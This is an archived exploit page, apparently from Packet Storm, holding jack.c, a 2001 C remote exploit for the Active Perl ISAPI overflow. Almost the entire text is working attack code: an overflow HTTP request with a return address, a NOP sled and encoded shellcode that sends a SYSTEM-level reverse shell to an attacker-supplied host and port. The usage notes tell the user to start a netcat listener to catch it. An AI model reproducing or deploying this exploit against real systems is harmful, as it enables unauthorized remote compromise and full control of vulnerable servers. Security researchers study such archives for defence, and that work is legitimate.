exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

jack.c

jack.c
Posted Dec 5, 2001
Authored by Indigo

Jack.c is a remote exploit for the Active Perl ISAPI overflow described in Bugtraq ID 3526. Sends you a shell with SYSTEM level access.

tags | exploit, remote, overflow, shell, perl
SHA-256 | 3745d798cbfd539aa3903eced68c73268af5b0ed42cc15a37971c2d5e4a435b4

jack.c

Change Mirror Download
/*  jack.c - Active Perl ISAPI overflow exploit by Indigo
<indigo@exploitingstuff.com> 2001

Usage: jack <victim host> <victim port> <attacker host> <attacker port>

Before executing jack start up a netcat listener with the port set to
'attacker port'

eg: nc -l -p 'attacker port'

You may need to hit return a few times to get the prompt up

main shellcode adapted from jill.c by dark spyrit <dspyrit@beavuh.org>

Greets to:

Morphsta, Br00t, Macavity, Jacob & Monkfish...Not forgetting D-Niderlunds
*/


#include <windows.h>
#include <stdio.h>
#include <winsock.h>


void main(int argc, char **argv)
{
SOCKET s = 0;
WSADATA wsaData;
int x;
unsigned short int a_port;
unsigned long a_host;

unsigned char shellcode[] =

"\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f" //GET /cgi-bin/

"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" //offset to
return address
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
"\x42\x42\x42\x8b\x94\xf8\x77\x42\x42\x42\x42"

"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3e\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x55\x3d\x97\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a"

"\x2E\x70\x6C\x20\x48\x54\x54\x50\x2F\x31\x2E\x30\x0D\x0A\x0D\x0A\x00";
//.pl HTTP/1.0\n\n

printf ("\njack - Active Perl ISAPI overflow launcher\nby Indigo
<indigo@exploitingstuff.com> 2001\n\n");

if (argc < 2)
{
printf ("Usage: %s <victim host> <victim port> <attacker host> <attacker
port>\n", argv[0]);
exit (0);
}

a_port = htons(atoi(argv[4]));
a_port^=0x9595;

a_host = inet_addr(argv[3]);
a_host^=0x95959595;

shellcode[745]= (a_port) & 0xff;
shellcode[746]= (a_port >> 8) & 0xff;

shellcode[750]= (a_host) & 0xff;
shellcode[751]= (a_host >> 8) & 0xff;
shellcode[752]= (a_host >> 16) & 0xff;
shellcode[753]= (a_host >> 24) & 0xff;

WSAStartup (MAKEWORD(2,0), &wsaData);

s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);

if (INVALID_SOCKET != s)
{
SOCKADDR_IN anAddr;
anAddr.sin_family = AF_INET;
anAddr.sin_port = htons (atoi(argv[2]));
anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

if (connect(s, (struct sockaddr *)&anAddr, sizeof (struct sockaddr)) == 0)

{
printf ("Sending exploit....");

if ((x = send (s, shellcode, strlen(shellcode), 0)) == 0)
{
printf ("send: error sending first packet\n\n");
exit (0);
}

printf ("Exploit sent.\n\n");

}
closesocket(s);
}
}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close